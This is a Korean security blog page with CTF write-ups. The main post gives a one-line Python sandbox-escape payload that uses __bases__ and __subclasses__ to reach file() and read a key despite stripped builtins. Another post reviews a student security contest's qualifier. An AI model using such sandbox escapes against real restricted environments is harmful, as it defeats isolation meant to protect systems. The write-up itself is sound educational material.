문제로 파이썬 소스가 주어집니다. 



builtins 모듈에서 후에 실행시켜줄 raw_input과 print 함수만을 제외하고는 다 지워버립니다.

그리고는 입력을 받고 exec을 통해 실행을 시켜주네요. __bases__ 와 __subclasses__ 모듈을 적절히 이용해 file()함수를 호출하여 키를 읽어 줄 수 있습니다.


root@ubuntu:~# cat key

this works

root@ubuntu:~# python tmp.py

Welcome to my Python sandbox! Enter commands below!

>>> print (().__class__.__bases__[0].__subclasses__()[40]("./key").read())

this works


익스플로잇이 간단해서 좋네요.

로컬에서 성공시키고 서버에서도 성공했었는데 지금은 서버가 닫혔네요ㅜㅜ


'General News > Write-Ups' 카테고리의 다른 글

HackIM nullcon 2015 exploitation100  (0) 2015.01.11
ChristmasCTF ALGO200  (0) 2014.12.26
codegate 2013 vuln200 - exploit only  (0) 2014.02.14
ropasaurusrex  (1) 2013.12.06
codegate junior ctf  (0) 2013.07.27
Posted by xer0s :

2014년 08월 08일날 순천향대 청소년 정보보호 페스티벌 예선전이 열렸었습니다. 이번에 굇수분들이 많이 빠지셔서 운이 좋게도 본선에 진출을 하게 되었네요. 17일날 본선 라운드를 진행하는데 좋은 결과 있었으면 좋겠습니다. 본선 진출자분들과 관계자분들 그때 뵈요! 

대회에 참여했던 사람으로써 간단하게 문제평을 해보자면 매끄럽지 못했던 문제들이 꽤 있었던 것 같습니다. Misc 200 같은 경우는 맥에서 키노트로 열면 키가 바로 보이기도 하였고 web200 같은경우는 출제자분이 의도했던 백터왜에도( 문제힌트로 Blind SQLI라고 나왔습니다) 여러 백터들이 있더군요. indirect sql injection이 그 중 하나였는데 대회 종료후에는 패치가 됐더군요.. system200도 아스키아머 때문에 문제를 풀지 못하는 경우가 있었는데.. 대회도중 no aslr, nx 서버환경등을 알려주더라구요(아는형이 따졌답니다) 제가 보안공부를 시작하고 처음 접했던 대회가 순천향대였던 만큼 아쉬운점들이 몇몇 있었습니다. 


그래도 대회기간동안 밤을 새가면서 대회운영을 해주신 운영진분들 수고하셨습니다.


Writeup 첨부합니다.

xeros_2014_YISF_문제풀이보고서.pdf



Posted by xer0s :

dragon

2014. 8. 12. 21:47

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.